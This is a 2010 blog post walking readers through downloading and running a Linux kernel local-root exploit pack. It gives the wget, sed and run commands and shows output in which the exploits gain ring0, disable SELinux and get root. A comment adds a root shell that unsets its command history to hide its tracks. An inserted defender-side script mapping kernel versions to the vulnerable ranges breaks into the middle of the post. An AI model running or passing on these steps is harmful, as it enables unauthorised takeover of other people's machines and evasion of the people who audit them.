ClsHack:Computer Security Blog    

[Exploit]Privilege Escalation Kernel


Unfortunately even Linux is sometimes a bit buggy :(


I am publishing this exploit a month after its release, for obvious security reasons.

The systems affected by this bug are the following:

  • Ubuntu Linux 9.10 sparc
  • Ubuntu Linux 9.10 powerpc
  • Ubuntu Linux 9.10 lpia
  • Ubuntu Linux 9.10 i386

Running this exploit as a normal user, we can open a root shell without knowing the root password.

Let's see how to try this exploit…
The first thing to do is to download the exploit.

wget http://www.clshack.com/nopaste/kernelRoot.tar.gz

tar xzvf kernelRoot.tar.gz

cd enlightenment

Now run everything:

sed -i '/turn_\(on\|off\)_wp();/d' exploit.c
./run_null_exploits.sh

Output:

Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...failed.
Compiling exp_wunderbar.c...OK.
[+] MAPPED ZERO PAGE!
Choose your exploit:
[0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
[1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root
[2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root
[3] Powerglove: Linux 2.6.31 perf_counter local root
[4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
[5] Wunderbar Emporium: Linux 2.X sendpage() local root
[6] Exit
> 5
------------------------------------------------------------------------------
The work of an intellectual is not to mould the political will of others; it
is, through the analyses that he does in his own field, to re-examine
evidence and assumptions, to shake up habitual ways of working and thinking,
to dissipate conventional familiarities, to re-evaluate rules and
institutions and to participate in the formation of a political will (where
he has his role as citizen to play). --Foucault
------------------------------------------------------------------------------
[+] Resolved security_ops to 0xffffffff8068d240
[+] Resolved sel_read_enforce to 0xffffffff803184fb
[+] got ring0!
[+] detected 2.6 style 8k stacks, with current at 0xffff88000b1d5040
[+] Disabled security of : SELinux
[+] Got root!
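As an added defender-side example (not part of the original post or of the exploit pack), the following POSIX shell script maps a kernel release string to the version ranges shown in the exploit menu above, so an administrator can triage which hosts need the kernel update. The bounds are read literally from the menu text, and "Linux 2.X" is taken as any 2.x kernel (an assumption), so a match is a prompt to check the distribution's advisory, not a verdict.

```shell
#!/bin/sh
# Added example, not from the original post: map a kernel release string to the
# version ranges printed in the exploit menu. Bounds are read literally from the
# menu; "2.X" is taken as any 2.x kernel (an assumption, not a precise range).

# ver_cmp A B: prints -1, 0 or 1 for A<B, A=B, A>B (dotted numeric versions;
# a missing component counts as 0, so 2.6.30 < 2.6.30.1).
ver_cmp() {
    a=$1 b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        ax=${a%%.*} bx=${b%%.*}
        case $a in *.*) a=${a#*.};; *) a='';; esac
        case $b in *.*) b=${b#*.};; *) b='';; esac
        [ "${ax:-0}" -lt "${bx:-0}" ] && { printf '%s\n' -1; return 0; }
        [ "${ax:-0}" -gt "${bx:-0}" ] && { printf '%s\n' 1; return 0; }
    done
    printf '%s\n' 0
}
ver_le() { [ "$(ver_cmp "$1" "$2")" -le 0 ]; }   # A <= B
ver_lt() { [ "$(ver_cmp "$1" "$2")" -lt 0 ]; }   # A <  B

# affected_exploits RELEASE: print the menu entries whose range covers RELEASE
# (e.g. "2.6.31-14-generic"); the distro suffix after '-' or '+' is dropped.
affected_exploits() {
    v=${1%%[-+]*}
    ver_le 2.6.30 "$v" && ver_le "$v" 2.6.30.1 && echo "Cheddar Bay (/dev/net/tun)"
    ver_le 2 "$v"      && ver_le "$v" 2.6.31   && echo "MooseCox (pipe)"
    ver_le 2.6.19 "$v" && ver_le "$v" 2.6.31.1 && echo "Paokara (eCryptfs)"
    [ "$(ver_cmp "$v" 2.6.31)" -eq 0 ]         && echo "Powerglove (perf_counter)"
    ver_lt "$v" 2.6.19                          && echo "The Rebel (udp_sendmsg)"
    ver_le 2 "$v"      && ver_lt "$v" 3         && echo "Wunderbar Emporium (sendpage)"
    return 0
}

# Check the running kernel when run directly, e.g. on each Ubuntu 9.10 host.
affected_exploits "$(uname -r)"
```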

Bye, have fun :D


This entry was posted on Wednesday, March 10th, 2010 at 6:23 pm and is filed under GNU/Linux, Hacking, Software.

Comments:
  • http://www.goodysound.netsons.org Andy

    As always very useful, Alessio.
    So kernels 2.6.32 and .33 are not affected by this vulnerability?

  • http://www.clshack.it Alessio

    No, anyway not by this one, but by these:

    [0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
    [1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root
    [2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root
    [3] Powerglove: Linux 2.6.31 perf_counter local root
    [4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
    [5] Wunderbar Emporium: Linux 2.X sendpage() local root

  • ov3rload

    It had already been going around for a while! =°P

  • vex

    [+] Disabled security of : nothing, what an insecure machine!
    [+] Got root!
    sh-3.2# unset HISTFILE;unset HISTSAVE
    sh-3.2# id
    uid=0(root) gid=0(root)

    vex: Thanks! ;)

  • clshack

    @vex:

    Happy that you're root :D